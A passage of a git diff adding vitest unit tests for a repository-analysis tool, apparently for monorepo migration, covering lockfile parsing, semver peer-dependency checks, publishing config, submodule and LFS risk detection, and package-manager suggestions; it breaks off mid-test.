+ 'go.mod': 'go 1.21\n', + }, + }); + + const result = await detectLanguages([{ path: repoPath, name: 'go-no-module' }]); + + expect(result).toHaveLength(1); + expect(result[0].languages[0].name).toBe('go'); + expect(result[0].languages[0].metadata).toBeUndefined(); + }); + + it('should handle Cargo.toml without package name', async () => { + const repoPath = await createTempFixture({ + name: 'rust-no-name', + files: { + 'Cargo.toml': '[workspace]\nmembers = ["crates/*"]\n', + }, + }); + + const result = await detectLanguages([{ path: repoPath, name: 'rust-no-name' }]); + + expect(result).toHaveLength(1); + expect(result[0].languages[0].name).toBe('rust'); + expect(result[0].languages[0].metadata).toBeUndefined(); + }); + + it('should call logger when provided', async () => { + const repoPath = await createTempFixture({ + name: 'log-test', + files: { 'go.mod': 'module test\n\ngo 1.21\n' }, + }); + + const logs: string[] = []; + const logger = { + info: (msg: string) => logs.push(msg), + success: () => {}, + warn: () => {}, + error: () => {}, + debug: () => {}, + log: () => {}, + }; + + await detectLanguages([{ path: repoPath, name: 'log-test' }], logger); + + expect(logs.some((l) => l.includes('1 non-JS language'))).toBe(true); + }); +}); diff --git a/tests/unit/analyzers/lockfile.test.ts b/tests/unit/analyzers/lockfile.test.ts index a75a04b..1a9276a 100755 --- a/tests/unit/analyzers/lockfile.test.ts +++ b/tests/unit/analyzers/lockfile.test.ts @@ -60,6 +60,21 @@ packages: expect(result['typescript']).toBe('5.3.3'); }); + it('should parse flat format with object-style dependency values', () => { + const content = `lockfileVersion: 5 + +dependencies: + lodash: + version: 4.17.21 + resolved: https://registry.npmjs.org/lodash + react: 18.2.0 +`; + + const result = parsePnpmLock(content); + expect(result['lodash']).toBe('4.17.21'); + expect(result['react']).toBe('18.2.0'); + }); + it('should return empty object for malformed content', () => { const result = 
parsePnpmLock('this is not valid yaml at all {}[]'); expect(result).toEqual({}); @@ -69,6 +84,24 @@ packages: const result = parsePnpmLock(''); expect(result).toEqual({}); }); + + it('should fall back to parsing versions from packages keys', () => { + const content = `lockfileVersion: '9.0' + +importers: + .: {} + +packages: + '@types/node@20.19.0': + resolution: {integrity: sha512-abc} + '/lodash/4.17.21': + resolution: {integrity: sha512-def} +`; + + const result = parsePnpmLock(content); + expect(result['@types/node']).toBe('20.19.0'); + expect(result['lodash']).toBe('4.17.21'); + }); }); describe('parseYarnLock', () => { @@ -124,6 +157,17 @@ react@^18.2.0: const result = parseYarnLock('not a valid lockfile'); expect(result).toEqual({}); }); + + it('should parse multi-selector entries and keep highest resolved version', () => { + const content = `# yarn lockfile v1 + +"react@^18.0.0", "react@^18.2.0": + version "18.2.0" +`; + + const result = parseYarnLock(content); + expect(result['react']).toBe('18.2.0'); + }); }); describe('parsePackageLock', () => { @@ -183,6 +227,39 @@ describe('parsePackageLock', () => { const result = parsePackageLock(JSON.stringify({ lockfileVersion: 3, packages: {} })); expect(result).toEqual({}); }); + + it('should parse v1 format with dependencies key (no packages)', () => { + const lockData = { + name: 'my-app', + version: '1.0.0', + lockfileVersion: 1, + dependencies: { + lodash: { version: '4.17.21', resolved: 'https://...' }, + react: { version: '18.2.0', resolved: 'https://...' 
}, + }, + }; + + const result = parsePackageLock(JSON.stringify(lockData)); + expect(result['lodash']).toBe('4.17.21'); + expect(result['react']).toBe('18.2.0'); + }); + + it('should use v1 fallback when packages key has only root entry', () => { + const lockData = { + lockfileVersion: 2, + packages: { + '': { name: 'my-app', version: '1.0.0' }, + }, + dependencies: { + lodash: { version: '4.17.21' }, + express: { version: '4.18.2' }, + }, + }; + + const result = parsePackageLock(JSON.stringify(lockData)); + expect(result['lodash']).toBe('4.17.21'); + expect(result['express']).toBe('4.18.2'); + }); }); describe('parseLockfile', () => { @@ -254,4 +331,16 @@ express@^4.18.0: const result = await parseLockfile(testDir, 'empty-lock'); expect(result).toBeNull(); }); + + it('should emit parse warning callback on invalid lockfile', async () => { + await fs.writeFile(path.join(testDir, 'pnpm-lock.yaml'), '['); + const warnings: string[] = []; + const result = await parseLockfile(testDir, 'warn-lock', { + onParseWarning: (message) => warnings.push(message), + }); + + expect(result).toBeNull(); + expect(warnings.length).toBeGreaterThan(0); + expect(warnings[0]).toContain('warn-lock'); + }); }); diff --git a/tests/unit/analyzers/peers.test.ts b/tests/unit/analyzers/peers.test.ts index e2d9376..5611db0 100755 --- a/tests/unit/analyzers/peers.test.ts +++ b/tests/unit/analyzers/peers.test.ts @@ -46,14 +46,22 @@ describe('satisfiesRange', () => { expect(satisfiesRange('0.9.9', '>=1.0.0')).toBe(false); }); - it('should return false for complex ranges', () => { - expect(satisfiesRange('1.0.0', '^1.0.0 || ^2.0.0')).toBe(false); - expect(satisfiesRange('1.5.0', '1.0.0 - 2.0.0')).toBe(false); + it('should handle complex ranges correctly', () => { + expect(satisfiesRange('1.0.0', '^1.0.0 || ^2.0.0')).toBe(true); + expect(satisfiesRange('2.5.0', '^1.0.0 || ^2.0.0')).toBe(true); + expect(satisfiesRange('3.0.0', '^1.0.0 || ^2.0.0')).toBe(false); + expect(satisfiesRange('1.5.0', '1.0.0 - 
2.0.0')).toBe(true); + expect(satisfiesRange('0.9.0', '1.0.0 - 2.0.0')).toBe(false); }); it('should handle non-parseable versions', () => { expect(satisfiesRange('not-a-version', '^1.0.0')).toBe(false); }); + + it('should return false for invalid range syntax', () => { + // Triggers the catch block when semver.satisfies throws + expect(satisfiesRange('1.0.0', 'completely invalid range !@#$%')).toBe(false); + }); }); describe('analyzePeerDependencies', () => { @@ -102,11 +110,11 @@ describe('analyzePeerDependencies', () => { const result = analyzePeerDependencies(packages, lockResolutions); expect(result).toHaveLength(1); expect(result[0].name).toBe('react'); - expect(result[0].confidence).toBe('medium'); + expect(result[0].confidence).toBe('high'); expect(result[0].conflictSource).toBe('peer-constraint'); }); - it('should use low confidence for complex ranges', () => { + it('should correctly evaluate complex ranges and emit conflict when unsatisfied', () => { const packages = [ createMockPackage('plugin', {}, {}, { react: '^16.0.0 || ^17.0.0' }), createMockPackage('app', { react: '^18.2.0' }), @@ -121,8 +129,28 @@ describe('analyzePeerDependencies', () => { ]; const result = analyzePeerDependencies(packages, lockResolutions); + // 18.2.0 does NOT satisfy ^16.0.0 || ^17.0.0, so a conflict is emitted expect(result).toHaveLength(1); - expect(result[0].confidence).toBe('low'); + expect(result[0].confidence).toBe('high'); + }); + + it('should not emit conflict when complex range IS satisfied', () => { + const packages = [ + createMockPackage('plugin', {}, {}, { react: '^17.0.0 || ^18.0.0' }), + createMockPackage('app', { react: '^18.2.0' }), + ]; + + const lockResolutions: LockfileResolution[] = [ + { + packageManager: 'npm', + repoName: 'app', + resolvedVersions: { react: '18.2.0' }, + }, + ]; + + const result = analyzePeerDependencies(packages, lockResolutions); + // 18.2.0 DOES satisfy ^17.0.0 || ^18.0.0 + expect(result).toHaveLength(0); }); it('should skip peer deps 
with no available version', () => { @@ -134,6 +162,26 @@ describe('analyzePeerDependencies', () => { expect(result).toEqual([]); }); + it('should use lockfile resolution from the same repo as peer dep', () => { + // The peer dep is in 'my-plugin', and the lockfile resolution is also for 'my-plugin' + const packages = [ + createMockPackage('my-plugin', {}, {}, { react: '^18.0.0' }), + createMockPackage('my-app', { react: '^18.2.0' }), + ]; + + const lockResolutions: LockfileResolution[] = [ + { + packageManager: 'npm', + repoName: 'my-plugin', + resolvedVersions: { react: '18.2.0' }, + }, + ]; + + const result = analyzePeerDependencies(packages, lockResolutions); + // 18.2.0 satisfies ^18.0.0, so no conflict + expect(result).toHaveLength(0); + }); + it('should use declared versions when no lockfile resolution exists', () => { const packages = [ createMockPackage('my-plugin', {}, {}, { react: '^17.0.0' }), diff --git a/tests/unit/analyzers/prepare.test.ts b/tests/unit/analyzers/prepare.test.ts new file mode 100644 index 0000000..8cccb6e --- /dev/null +++ b/tests/unit/analyzers/prepare.test.ts @@ -0,0 +1,117 @@ +import { describe, it, expect, afterEach } from 'vitest'; +import { + analyzeRepoForPreparation, + analyzeReposForPreparation, +} from '../../../src/analyzers/prepare.js'; +import { createTempFixture, cleanupFixtures } from '../../helpers/fixtures.js'; + +describe('analyzeRepoForPreparation', () => { + afterEach(async () => { + await cleanupFixtures(); + }); + + it('should detect .nvmrc and .node-version files', async () => { + const repoPath = await createTempFixture({ + name: 'repo-with-version-files', + packageJson: { name: 'test', version: '1.0.0' }, + files: { + '.nvmrc': '20', + '.node-version': '20.11.0', + }, + }); + + const result = await analyzeRepoForPreparation(repoPath, 'test-repo'); + expect(result.nvmrc).toBe('20'); + expect(result.nodeVersion).toBe('20.11.0'); + }); + + it('should return null for missing .nvmrc and .node-version', async () => { 
+ const repoPath = await createTempFixture({ + name: 'repo-no-version-files', + packageJson: { name: 'test', version: '1.0.0' }, + }); + + const result = await analyzeRepoForPreparation(repoPath, 'test-repo'); + expect(result.nvmrc).toBeNull(); + expect(result.nodeVersion).toBeNull(); + }); + + it('should extract engines.node from package.json', async () => { + const repoPath = await createTempFixture({ + name: 'repo-engines', + packageJson: { name: 'test', version: '1.0.0', engines: { node: '>=18' } }, + }); + + const result = await analyzeRepoForPreparation(repoPath, 'test-repo'); + expect(result.enginesNode).toBe('>=18'); + }); + + it('should detect build scripts', async () => { + const repoPath = await createTempFixture({ + name: 'repo-build', + packageJson: { + name: 'test', + version: '1.0.0', + scripts: { build: 'tsc', test: 'vitest' }, + }, + }); + + const result = await analyzeRepoForPreparation(repoPath, 'test-repo'); + expect(result.hasBuildScript).toBe(true); + expect(result.existingBuildScript).toBe('tsc'); + }); + + it('should detect packageManager field', async () => { + const repoPath = await createTempFixture({ + name: 'repo-pm', + packageJson: { + name: 'test', + version: '1.0.0', + packageManager: 'pnpm@9.0.0', + }, + }); + + const result = await analyzeRepoForPreparation(repoPath, 'test-repo'); + expect(result.existingPackageManagerField).toBe('pnpm@9.0.0'); + }); + + it('should handle missing package.json', async () => { + const repoPath = await createTempFixture({ + name: 'repo-no-pkg', + files: { 'README.md': '# Hello' }, + }); + + const result = await analyzeRepoForPreparation(repoPath, 'test-repo'); + expect(result.enginesNode).toBeNull(); + expect(result.hasBuildScript).toBe(false); + expect(result.existingPackageManagerField).toBeNull(); + }); +}); + +describe('analyzeReposForPreparation', () => { + afterEach(async () => { + await cleanupFixtures(); + }); + + it('should analyze multiple repos and generate patches/checklist', async () => { 
+ const repo1 = await createTempFixture({ + name: 'prep-repo-1', + packageJson: { name: 'app-a', version: '1.0.0' }, + files: { '.nvmrc': '18' }, + }); + const repo2 = await createTempFixture({ + name: 'prep-repo-2', + packageJson: { name: 'app-b', version: '1.0.0' }, + files: { '.nvmrc': '20' }, + }); + + const result = await analyzeReposForPreparation([ + { path: repo1, name: 'prep-repo-1' }, + { path: repo2, name: 'prep-repo-2' }, + ]); + + expect(result.repos).toHaveLength(2); + expect(Array.isArray(result.checklist)).toBe(true); + expect(Array.isArray(result.patches)).toBe(true); + }); +}); diff --git a/tests/unit/analyzers/publishing.test.ts b/tests/unit/analyzers/publishing.test.ts new file mode 100755 index 0000000..1454d5d --- /dev/null +++ b/tests/unit/analyzers/publishing.test.ts @@ -0,0 +1,160 @@ +import { describe, it, expect, afterEach } from 'vitest'; +import { analyzePublishing } from '../../../src/analyzers/publishing.js'; +import { createTempFixture, cleanupFixtures } from '../../helpers/fixtures.js'; +import { createMockLogger } from '../../helpers/mocks.js'; + +describe('analyzePublishing', () => { + const logger = createMockLogger(); + + afterEach(async () => { + await cleanupFixtures(); + }); + + it('should detect publishable packages without publishConfig', async () => { + const repoPath = await createTempFixture({ + name: 'publishable-repo', + packageJson: { name: 'my-lib', version: '1.0.0' }, + }); + + const findings = await analyzePublishing( + [{ path: repoPath, name: 'publishable-repo' }], + logger, + ); + + const noConfig = findings.find((f) => f.id.startsWith('publishing-no-config')); + expect(noConfig).toBeDefined(); + }); + + it('should detect custom registries', async () => { + const repoPath = await createTempFixture({ + name: 'custom-reg-repo', + packageJson: { + name: 'internal-lib', + version: '1.0.0', + publishConfig: { registry: 'https://npm.internal.company.com/' }, + }, + }); + + const findings = await analyzePublishing( + 
[{ path: repoPath, name: 'custom-reg-repo' }], + logger, + ); + + const customReg = findings.find((f) => f.id.startsWith('publishing-custom-registry')); + expect(customReg).toBeDefined(); + }); + + it('should detect multiple registries', async () => { + const repo1 = await createTempFixture({ + name: 'registry-repo-1', + packageJson: { + name: 'lib-a', + version: '1.0.0', + publishConfig: { registry: 'https://npm.company-a.com/' }, + }, + }); + const repo2 = await createTempFixture({ + name: 'registry-repo-2', + packageJson: { + name: 'lib-b', + version: '1.0.0', + publishConfig: { registry: 'https://npm.company-b.com/' }, + }, + }); + + const findings = await analyzePublishing( + [ + { path: repo1, name: 'registry-repo-1' }, + { path: repo2, name: 'registry-repo-2' }, + ], + logger, + ); + + const multiReg = findings.find((f) => f.id === 'publishing-multiple-registries'); + expect(multiReg).toBeDefined(); + expect(multiReg!.severity).toBe('warn'); + }); + + it('should handle malformed package.json gracefully', async () => { + const repoPath = await createTempFixture({ + name: 'malformed-pub-repo', + files: { + 'package.json': '{ invalid json !!!', + }, + }); + + const findings = await analyzePublishing( + [{ path: repoPath, name: 'malformed-pub-repo' }], + logger, + ); + + const malformed = findings.find( + (f) => f.id === 'publishing-malformed-package-json-malformed-pub-repo' + ); + expect(malformed).toBeDefined(); + expect(malformed?.severity).toBe('warn'); + }); + + it('should detect packages without main/exports', async () => { + const repoPath = await createTempFixture({ + name: 'no-entry-repo', + packageJson: { name: 'no-entry-lib', version: '1.0.0' }, + }); + + const findings = await analyzePublishing( + [{ path: repoPath, name: 'no-entry-repo' }], + logger, + ); + + const noEntry = findings.find((f) => f.id.startsWith('publishing-no-entry')); + expect(noEntry).toBeDefined(); + }); + + it('should detect packages without files field', async () => { + const 
repoPath = await createTempFixture({ + name: 'no-files-repo', + packageJson: { name: 'no-files-lib', version: '1.0.0', main: 'index.js' }, + }); + + const findings = await analyzePublishing( + [{ path: repoPath, name: 'no-files-repo' }], + logger, + ); + + const noFiles = findings.find((f) => f.id.startsWith('publishing-no-files')); + expect(noFiles).toBeDefined(); + }); + + it('should not flag custom registry for npmjs.org', async () => { + const repoPath = await createTempFixture({ + name: 'npmjs-repo', + packageJson: { + name: 'lib', + version: '1.0.0', + publishConfig: { registry: 'https://registry.npmjs.org/' }, + }, + }); + + const findings = await analyzePublishing( + [{ path: repoPath, name: 'npmjs-repo' }], + logger, + ); + + const customReg = findings.find((f) => f.id.startsWith('publishing-custom-registry')); + expect(customReg).toBeUndefined(); + }); + + it('should not flag private packages', async () => { + const repoPath = await createTempFixture({ + name: 'private-repo', + packageJson: { name: 'private-app', version: '1.0.0', private: true }, + }); + + const findings = await analyzePublishing( + [{ path: repoPath, name: 'private-repo' }], + logger, + ); + + expect(findings.filter((f) => f.id.startsWith('publishing-no-config'))).toHaveLength(0); + }); +}); diff --git a/tests/unit/analyzers/repo-risks.test.ts b/tests/unit/analyzers/repo-risks.test.ts new file mode 100755 index 0000000..929402f --- /dev/null +++ b/tests/unit/analyzers/repo-risks.test.ts @@ -0,0 +1,208 @@ +import { describe, it, expect, afterEach } from 'vitest'; +import { analyzeRepoRisks } from '../../../src/analyzers/repo-risks.js'; +import { createTempFixture, cleanupFixtures } from '../../helpers/fixtures.js'; +import { createMockLogger } from '../../helpers/mocks.js'; + +describe('analyzeRepoRisks', () => { + const logger = createMockLogger(); + + afterEach(async () => { + await cleanupFixtures(); + }); + + it('should detect git submodules', async () => { + const repoPath = await 
createTempFixture({ + name: 'repo-submodule', + packageJson: { name: 'test', version: '1.0.0' }, + files: { + '.gitmodules': '[submodule "vendor/lib"]\n\tpath = vendor/lib\n\turl = https://github.com/org/lib.git', + }, + }); + + const findings = await analyzeRepoRisks( + [{ path: repoPath, name: 'repo-submodule' }], + logger, + ); + + const submodule = findings.find((f) => f.id.startsWith('risk-submodules')); + expect(submodule).toBeDefined(); + expect(submodule!.severity).toBe('error'); + }); + + it('should detect Git LFS', async () => { + const repoPath = await createTempFixture({ + name: 'repo-lfs', + packageJson: { name: 'test', version: '1.0.0' }, + files: { + '.gitattributes': '*.psd filter=lfs diff=lfs merge=lfs -text\n*.zip filter=lfs diff=lfs merge=lfs -text', + }, + }); + + const findings = await analyzeRepoRisks( + [{ path: repoPath, name: 'repo-lfs' }], + logger, + ); + + const lfs = findings.find((f) => f.id.startsWith('risk-lfs')); + expect(lfs).toBeDefined(); + expect(lfs!.severity).toBe('warn'); + expect(lfs!.evidence.length).toBe(2); // Two LFS patterns + }); + + it('should return empty findings for clean repo', async () => { + const repoPath = await createTempFixture({ + name: 'clean-repo', + packageJson: { name: 'test', version: '1.0.0' }, + }); + + const findings = await analyzeRepoRisks( + [{ path: repoPath, name: 'clean-repo' }], + logger, + ); + + // Should have no submodule/LFS findings (may have large file findings) + expect(findings.filter((f) => f.id.startsWith('risk-submodules'))).toHaveLength(0); + expect(findings.filter((f) => f.id.startsWith('risk-lfs'))).toHaveLength(0); + }); + + it('should count multiple submodules correctly', async () => { + const repoPath = await createTempFixture({ + name: 'repo-multi-sub', + packageJson: { name: 'test', version: '1.0.0' }, + files: { + '.gitmodules': + '[submodule "a"]\n\tpath = a\n\turl = u\n[submodule "b"]\n\tpath = b\n\turl = u2\n', + }, + }); + + const findings = await analyzeRepoRisks( + 
[{ path: repoPath, name: 'repo-multi-sub' }], + logger, + ); + const sub = findings.find((f) => f.id === 'risk-submodules-repo-multi-sub'); + expect(sub).toBeDefined(); + expect(sub!.evidence[0].snippet).toContain('2 submodule'); + }); + + it('should not flag .gitattributes without LFS filters', async () => { + const repoPath = await createTempFixture({ + name: 'repo-no-lfs', + packageJson: { name: 'test', version: '1.0.0' }, + files: { + '.gitattributes': '*.md text=auto\n*.sh text eol=lf\n', + }, + }); + + const findings = await analyzeRepoRisks( + [{ path: repoPath, name: 'repo-no-lfs' }], + logger, + ); + expect(findings.filter((f) => f.id.startsWith('risk-lfs'))).toHaveLength(0); + }); + + it('should detect large files above 1MB threshold', async () => { + const repoPath = await createTempFixture({ + name: 'repo-large', + packageJson: { name: 'test', version: '1.0.0' }, + files: { + 'small.txt': 'hello world', + }, + }); + // Write a large file directly (>1MB) + const fs = await import('fs-extra'); + const path = await import('node:path'); + await fs.writeFile(path.join(repoPath, 'big-bundle.js'), Buffer.alloc(1_100_000, 'x')); + + const findings = await analyzeRepoRisks( + [{ path: repoPath, name: 'repo-large' }], + logger, + ); + const large = findings.filter((f) => f.id.startsWith('risk-large-file')); + expect(large.length).toBeGreaterThanOrEqual(1); + expect(large[0].severity).toBe('warn'); + expect(large[0].title).toContain('big-bundle.js'); + }); + + it('should detect case collisions across repos', async () => { + const repoAPath = await createTempFixture({ + name: 'repo-case-a', + packageJson: { name: 'a', version: '1.0.0' }, + files: { 'Utils.ts': 'export const a = 1;' }, + }); + const repoBPath = await createTempFixture({ + name: 'repo-case-b', + packageJson: { name: 'b', version: '1.0.0' }, + files: { 'utils.ts': 'export const b = 1;' }, + }); + + const findings = await analyzeRepoRisks( + [ + { path: repoAPath, name: 'repo-case-a' }, + { path: 
repoBPath, name: 'repo-case-b' }, + ], + logger, + ); + const collisions = findings.filter((f) => f.id.startsWith('risk-case-collision')); + expect(collisions).toHaveLength(1); + expect(collisions[0].severity).toBe('error'); + }); + + it('should not flag identical file names as case collisions', async () => { + const repoAPath = await createTempFixture({ + name: 'repo-same-a', + packageJson: { name: 'a', version: '1.0.0' }, + files: { 'README.md': 'A' }, + }); + const repoBPath = await createTempFixture({ + name: 'repo-same-b', + packageJson: { name: 'b', version: '1.0.0' }, + files: { 'README.md': 'B' }, + }); + + const findings = await analyzeRepoRisks( + [ + { path: repoAPath, name: 'repo-same-a' }, + { path: repoBPath, name: 'repo-same-b' }, + ], + logger, + ); + const collisions = findings.filter((f) => f.id.startsWith('risk-case-collision')); + expect(collisions).toHaveLength(0); + }); + + it('should handle non-existent repo path gracefully', async () => { + const findings = await analyzeRepoRisks( + [{ path: '/nonexistent/repo/path', name: 'ghost-repo' }], + logger, + ); + // Should not throw, just skip the failed repo + expect(Array.isArray(findings)).toBe(true); + }); + + it('should handle mixed findings across multiple repos', async () => { + const repoAPath = await createTempFixture({ + name: 'repo-mixed-a', + packageJson: { name: 'a', version: '1.0.0' }, + files: { + '.gitmodules': '[submodule "lib"]\n\tpath = lib\n\turl = u\n', + }, + }); + const repoBPath = await createTempFixture({ + name: 'repo-mixed-b', + packageJson: { name: 'b', version: '1.0.0' }, + files: { + '.gitattributes': '*.bin filter=lfs diff=lfs merge=lfs -text\n', + }, + }); + + const findings = await analyzeRepoRisks( + [ + { path: repoAPath, name: 'repo-mixed-a' }, + { path: repoBPath, name: 'repo-mixed-b' }, + ], + logger, + ); + expect(findings.some((f) => f.id === 'risk-submodules-repo-mixed-a')).toBe(true); + expect(findings.some((f) => f.id === 
'risk-lfs-repo-mixed-b')).toBe(true); + }); +}); diff --git a/tests/unit/analyzers/risk-summary.test.ts b/tests/unit/analyzers/risk-summary.test.ts new file mode 100644 index 0000000..e9f077c --- /dev/null +++ b/tests/unit/analyzers/risk-summary.test.ts @@ -0,0 +1,164 @@ +import { describe, it, expect } from 'vitest'; +import { classifyRisk } from '../../../src/analyzers/risk-summary.js'; +import type { AnalysisFinding } from '../../../src/types/index.js'; + +function makeFinding(overrides: Partial<AnalysisFinding> = {}): AnalysisFinding { + return { + id: 'test-finding', + title: 'Test finding', + severity: 'info', + confidence: 'high', + evidence: [], + suggestedAction: 'Test action', + ...overrides, + }; +} + +describe('classifyRisk', () => { + it('should return straightforward when no findings', () => { + const result = classifyRisk([]); + expect(result.classification).toBe('straightforward'); + expect(result.reasons).toContain('No significant risks detected'); + expect(result.topFindings).toEqual([]); + }); + + it('should return straightforward for info-only findings', () => { + const result = classifyRisk([ + makeFinding({ id: 'a', severity: 'info' }), + makeFinding({ id: 'b', severity: 'info' }), + ]); + expect(result.classification).toBe('straightforward'); + expect(result.reasons).toContain('No significant risks detected'); + }); + + it('should classify as complex when critical findings exist', () => { + const result = classifyRisk([ + makeFinding({ id: 'crit-1', severity: 'critical' }), + ]); + expect(result.classification).toBe('complex'); + expect(result.reasons.some((r) => r.includes('1 critical issue'))).toBe(true); + }); + + it('should classify as needs-decisions when error findings exist', () => { + const result = classifyRisk([ + makeFinding({ id: 'err-1', severity: 'error' }), + ]); + expect(result.classification).toBe('needs-decisions'); + expect(result.reasons.some((r) => r.includes('1 error-level finding'))).toBe(true); + }); + + it('should stay complex when 
both critical and error findings exist', () => { + const result = classifyRisk([ + makeFinding({ id: 'crit-1', severity: 'critical' }), + makeFinding({ id: 'err-1', severity: 'error' }), + ]); + expect(result.classification).toBe('complex'); + expect(result.reasons).toHaveLength(2); + }); + + it('should classify as needs-decisions when more than 3 warnings', () => { + const result = classifyRisk([ + makeFinding({ id: 'w1', severity: 'warn' }), + makeFinding({ id: 'w2', severity: 'warn' }), + makeFinding({ id: 'w3', severity: 'warn' }), + makeFinding({ id: 'w4', severity: 'warn' }), + ]); + expect(result.classification).toBe('needs-decisions'); + expect(result.reasons.some((r) => r.includes('4 warnings'))).toBe(true); + }); + + it('should stay straightforward with 3 or fewer warnings', () => { + const result = classifyRisk([ + makeFinding({ id: 'w1', severity: 'warn' }), + makeFinding({ id: 'w2', severity: 'warn' }), + makeFinding({ id: 'w3', severity: 'warn' }), + ]); + expect(result.classification).toBe('straightforward'); + }); + + it('should classify as complex when submodules are detected', () => { + const result = classifyRisk([ + makeFinding({ id: 'risk-submodules-repo-a', severity: 'error' }), + ]); + expect(result.classification).toBe('complex'); + expect(result.reasons.some((r) => r.includes('submodules'))).toBe(true); + }); + + it('should classify as needs-decisions when LFS is detected', () => { + const result = classifyRisk([ + makeFinding({ id: 'risk-lfs-repo-a', severity: 'warn' }), + ]); + expect(result.classification).toBe('needs-decisions'); + expect(result.reasons.some((r) => r.includes('LFS'))).toBe(true); + }); + + it('should classify as needs-decisions when multiple CI systems detected', () => { + const result = classifyRisk([ + makeFinding({ id: 'ci-multiple-systems', severity: 'warn' }), + ]); + expect(result.classification).toBe('needs-decisions'); + expect(result.reasons.some((r) => r.includes('CI system'))).toBe(true); + }); + + it('should 
note node mismatch without upgrading classification', () => { + const result = classifyRisk([ + makeFinding({ id: 'env-node-mismatch', severity: 'warn' }), + ]); + // Only 1 warning, so classification stays straightforward + expect(result.classification).toBe('straightforward'); + expect(result.reasons.some((r) => r.includes('Node.js'))).toBe(true); + }); + + it('should classify as complex when case collisions detected', () => { + const result = classifyRisk([ + makeFinding({ id: 'risk-case-collision-readme', severity: 'error' }), + ]); + expect(result.classification).toBe('complex'); + expect(result.reasons.some((r) => r.includes('case collision'))).toBe(true); + }); + + it('should return top 5 findings sorted by severity', () => { + const findings = [ + makeFinding({ id: 'info-1', severity: 'info' }), + makeFinding({ id: 'warn-1', severity: 'warn' }), + makeFinding({ id: 'crit-1', severity: 'critical' }), + makeFinding({ id: 'err-1', severity: 'error' }), + makeFinding({ id: 'err-2', severity: 'error' }), + makeFinding({ id: 'info-2', severity: 'info' }), + makeFinding({ id: 'warn-2', severity: 'warn' }), + ]; + + const result = classifyRisk(findings); + expect(result.topFindings).toHaveLength(5); + expect(result.topFindings[0].id).toBe('crit-1'); + expect(result.topFindings[1].severity).toBe('error'); + expect(result.topFindings[2].severity).toBe('error'); + }); + + it('should return all findings as topFindings when fewer than 5', () => { + const findings = [ + makeFinding({ id: 'a', severity: 'warn' }), + makeFinding({ id: 'b', severity: 'error' }), + ]; + + const result = classifyRisk(findings); + expect(result.topFindings).toHaveLength(2); + expect(result.topFindings[0].id).toBe('b'); // error first + expect(result.topFindings[1].id).toBe('a'); // warn second + }); + + it('should accumulate multiple reasons from different risk patterns', () => { + const findings = [ + makeFinding({ id: 'risk-submodules-repo', severity: 'error' }), + makeFinding({ id: 
'risk-lfs-repo', severity: 'warn' }), + makeFinding({ id: 'ci-multiple-systems', severity: 'warn' }), + makeFinding({ id: 'env-node-mismatch', severity: 'warn' }), + makeFinding({ id: 'risk-case-collision-x', severity: 'error' }), + ]; + + const result = classifyRisk(findings); + expect(result.classification).toBe('complex'); + // Should have reasons for: errors, submodules, LFS, multiple CI, node mismatch, case collision + expect(result.reasons.length).toBeGreaterThanOrEqual(5); + }); +}); diff --git a/tests/unit/analyzers/suggestions.test.ts b/tests/unit/analyzers/suggestions.test.ts new file mode 100755 index 0000000..8ac8640 --- /dev/null +++ b/tests/unit/analyzers/suggestions.test.ts @@ -0,0 +1,440 @@ +import { describe, it, expect, afterEach } from 'vitest'; +import { + suggestPackageManager, + suggestWorkspaceTool, + suggestDependencyStrategy, +} from '../../../src/analyzers/suggestions.js'; +import { createTempFixture, cleanupFixtures } from '../../helpers/fixtures.js'; +import type { DependencyConflict } from '../../../src/types/index.js'; + +afterEach(async () => { + await cleanupFixtures(); +}); + +describe('suggestPackageManager', () => { + it('should suggest pnpm when repos have pnpm-lock.yaml', async () => { + const repoA = await createTempFixture({ + name: 'repo-a', + packageJson: { name: 'repo-a', version: '1.0.0' }, + files: { 'pnpm-lock.yaml': 'lockfileVersion: 6\n' }, + }); + const repoB = await createTempFixture({ + name: 'repo-b', + packageJson: { name: 'repo-b', version: '1.0.0' }, + files: { 'pnpm-lock.yaml': 'lockfileVersion: 6\n' }, + }); + + const result = await suggestPackageManager([ + { path: repoA, name: 'repo-a' }, + { path: repoB, name: 'repo-b' }, + ]); + + expect(result.suggestion).toBe('pnpm'); + expect(result.confidence).toBe('high'); + expect(result.evidence).toContain('repo-a has pnpm-lock.yaml'); + expect(result.evidence).toContain('repo-b has pnpm-lock.yaml'); + expect(result.topic).toBe('package-manager'); + }); + + 
it('should suggest yarn when repos have yarn.lock', async () => { + const repoA = await createTempFixture({ + name: 'repo-a', + packageJson: { name: 'repo-a', version: '1.0.0' }, + files: { 'yarn.lock': '# yarn lockfile v1\n' }, + }); + const repoB = await createTempFixture({ + name: 'repo-b', + packageJson: { name: 'repo-b', version: '1.0.0' }, + files: { 'yarn.lock': '# yarn lockfile v1\n' }, + }); + + const result = await suggestPackageManager([ + { path: repoA, name: 'repo-a' }, + { path: repoB, name: 'repo-b' }, + ]); + + expect(result.suggestion).toBe('yarn'); + expect(result.confidence).toBe('high'); + }); + + it('should suggest npm when repos have package-lock.json', async () => { + const repoA = await createTempFixture({ + name: 'repo-a', + packageJson: { name: 'repo-a', version: '1.0.0' }, + files: { 'package-lock.json': '{}' }, + }); + + const result = await suggestPackageManager([ + { path: repoA, name: 'repo-a' }, + ]); + + expect(result.suggestion).toBe('npm'); + expect(result.confidence).toBe('high'); + }); + + it('should detect packageManager field in package.json', async () => { + const repoA = await createTempFixture({ + name: 'repo-a', + packageJson: { + name: 'repo-a', + version: '1.0.0', + packageManager: 'pnpm@8.15.0', + }, + }); + + const result = await suggestPackageManager([ + { path: repoA, name: 'repo-a' }, + ]); + + expect(result.suggestion).toBe('pnpm'); + expect(result.evidence.some((e) => e.includes('packageManager field'))).toBe(true); + }); + + it('should prefer pnpm when tied', async () => { + const repoA = await createTempFixture({ + name: 'repo-a', + packageJson: { name: 'repo-a', version: '1.0.0' }, + files: { 'pnpm-lock.yaml': '' }, + }); + const repoB = await createTempFixture({ + name: 'repo-b', + packageJson: { name: 'repo-b', version: '1.0.0' }, + files: { 'yarn.lock': '' }, + }); + + const result = await suggestPackageManager([ + { path: repoA, name: 'repo-a' }, + { path: repoB, name: 'repo-b' }, + ]); + + 
